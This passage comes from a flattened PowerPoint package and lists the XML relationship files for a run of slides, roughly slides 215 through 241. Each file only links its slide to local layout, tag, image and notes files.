</file>

<file path=ppt/slides/_rels/slide215.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1982.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag833.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag832.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag831.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide216.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1992.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag836.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag835.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag834.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide217.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2001.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag840.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag839.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag838.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag837.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide218.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2011.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag844.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag843.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag842.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag841.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide219.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2021.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag848.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag847.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag846.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag845.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide22.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag76.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag75.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag74.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag73.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag72.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag71.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag70.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag69.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout51.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag80.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag79.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag78.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag77.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag68.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide220.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2031.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag852.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag851.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag850.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag849.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide221.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2041.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag857.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag856.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag855.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag854.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag853.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide222.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide16.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2051.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image130.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag861.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag860.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag859.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag858.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide223.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide17.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2061.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image132.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image131.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag865.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag864.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag863.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag862.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide224.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide18.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2071.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image134.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image133.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag869.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag868.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag867.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag866.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide225.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide19.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2081.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image135.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag873.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag872.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag871.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag870.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide226.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2091.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image137.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag877.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag876.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag875.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag874.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide227.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2101.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image138.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag881.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag880.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag879.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag878.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide228.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2111.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image139.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag885.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag884.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag883.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag882.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide229.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2121.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image140.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag889.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag888.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag887.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag886.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout62.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag83.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag82.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag81.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide230.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2131.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image142.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image141.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag893.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag892.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag891.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag890.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide231.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2141.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image144.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image143.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag897.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag896.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag895.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag894.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide232.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2151.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image145.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag901.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag900.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag899.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag898.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide233.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2161.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image147.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image146.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag905.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag904.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag903.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag902.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide234.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2171.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image149.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image148.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag909.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag908.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag907.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag906.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide235.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2181.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image150.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag913.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag912.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag911.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag910.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide236.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2191.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image152.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image151.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag917.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag916.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag915.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag914.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide237.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2201.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image154.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image153.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag921.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag920.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag919.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag918.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide238.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2211.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image155.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag925.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag924.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag923.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag922.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide239.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2221.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image157.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image156.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag929.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag928.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag927.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag926.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout72.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag86.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag85.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag84.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide240.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2231.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image159.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image158.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag933.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag932.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag931.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag930.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide241.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
